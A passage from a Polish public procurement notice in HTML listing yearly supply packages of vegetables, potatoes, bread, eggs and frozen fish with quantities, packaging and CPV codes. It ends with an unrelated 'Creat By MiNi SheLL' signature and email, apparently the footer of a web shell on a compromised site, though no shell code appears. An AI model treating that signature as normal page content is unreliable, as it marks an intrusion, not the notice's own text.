ilość na 12 m-cy: 8000 kg
Worek 10 kg, płukana, bez śladów piachu i brudu
12. Natka pietruszki
ilość na 12 m-cy: 740 pęczków
Pęczek po 10 szt.	
13. Ogórek zielony - sezon
ilość na 12 m-cy: 400 kg
Worek 10 kg
14. Ogórek zielony poza sezonem
ilość na 12 m-cy: 200 kg
luz
15. Ogórek kiszony
ilość na 12 m-cy: 500 kg
Woreczek foliowy 0,5 kg
16. Pietruszka - korzeń
ilość na 12 m-cy: 500 kg
Worek 5 kg, płukana, bez śladów piachu i brudu
17. Pomidor - sezon
ilość na 12 m-cy: 800 kg
Skrzynka 5 kg
18. Rzodkiew biała
ilość na 12 m-cy: 400 kg
Skrzynka 10 kg
19. Seler
ilość na 12 m-cy: 1400 kg
Worek 5 kg, płukany, bez śladów piachu i brudu
20. Sałata - sezon
ilość na 12 m-cy: 705 szt.
Skrzynka 15 szt.
21. Szczypior 
ilość na 12 m-cy: 400 pęczków
Opakowanie 1 kg
22. Groch łuskany	
ilość na 12 m-cy: 100 torebek po 500 g
Torebka 500 g
23. Pomidor poza sezonem 
ilość na 12 m-cy: 500 kg
Skrzynka 15 kg, pomidor okrągły o wadze 100 g za 1 szt.
24. Gruszka
ilość na 12 m-cy: 70 kg
Skrzynka 5 kg
25. Banan
ilość na 12 m-cy: 70 kg
Karton 18 kg
26. Por
ilość na 12 m-cy: 150 kg
Luz
27. Brokuły
ilość na 12 m-cy: 250 szt.
Skrzynka 10 szt.
28. Brukselka
ilość na 12 m-cy: 400 kg
Worek po 2 kg
29. Rzodkiewka
ilość na 12 m-cy: 540 pęczków
Pęczek po 10 szt.
30. Pomarańcza
ilość na 12 m-cy: 70 kg
Siatka 2 kg
31. Pieczarka sezon/poza sezonem
ilość na 12 m-cy: 100 kg
Skrzynka 5 kg
32. Mandarynka sezon
ilość na 12 m-cy: 600 kg
Siatka 2 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.23.21-9, 03.22.23.22-6, 03.22.21.11-4, 03.22.22.20-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 - Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Ziemniaki
ilość na 12 m-cy: 36 000 kg
Worek 30 kg
2. Ziemniaki młode sezon
ilość na 12 m-cy: 12 000 kg
Worek 30 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.31.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Bułka
ilość na 12 m-cy: 23 400 szt.
Bułka krojona, opakowanie termiczne pokrywające wyrób, waga 400g, kształt podłużny, wyraźny podział na kromki o jednakowej długości, skórka ściśle powiązana z miękiszem. Miękisz zwarty, jednolity. Widoczne oznakowanie pieczywa z datą ważności.
2. Chleb
ilość na 12 m-cy: 9000 szt.
Chleb krojony, opakowanie termiczne pokrywające wyrób, waga 600g, kształt podłużny, wyraźny podział na kromki o jednakowej długości. Skórka ściśle powiązana z miękiszem. Miękisz zwarty, jednolity. Widoczne oznakowanie pieczywa z datą ważności.
3. Chleb razowy
ilość na 12 m-cy: 600 szt.
Chleb krojony, opakowanie termiczne pokrywające wyrób, waga 500g, kształt podłużny, wyraźny podział na kromki o jednakowej długości. Skórka ściśle powiązana z miękiszem. Miękisz zwarty, jednolity. Widoczne oznakowanie pieczywa z datą ważności.
4.Bułka tarta
ilość na 12 m-cy: 340 opakowań po 0,5 kg
Opakowanie 0,5 kg. Barwa od szarokremowej do złocistej, postać sypka bez grudek, zapach swoisty bez obcych zapachów, smak charakterystyczny dla suszonego pieczywa bez obcych posmaków, wilgotność nie więcej niż 10%, zawartość cukru w suchej masie nie więcej niż 5%.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.11.00-7, 15.81.10.00-6, 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet nr 8 - Jajka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jajko
ilość na 12 m-cy: 35 000 szt.
Rozmiar M 53-63 g. Pakowane w wytłaczanki po 10 szt. Klasa 1A. szczegółowe znakowanie opakowania zbiorczego (data ważności, klasa wagowa, rozmiar). Pojedyncze sztuki oznakowane pieczątką producenta..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet nr 9 - Ryby mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ryba mrożona sola - filet bez skóry
ilość na 12 m-cy: 1000 kg
Tafla 5 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com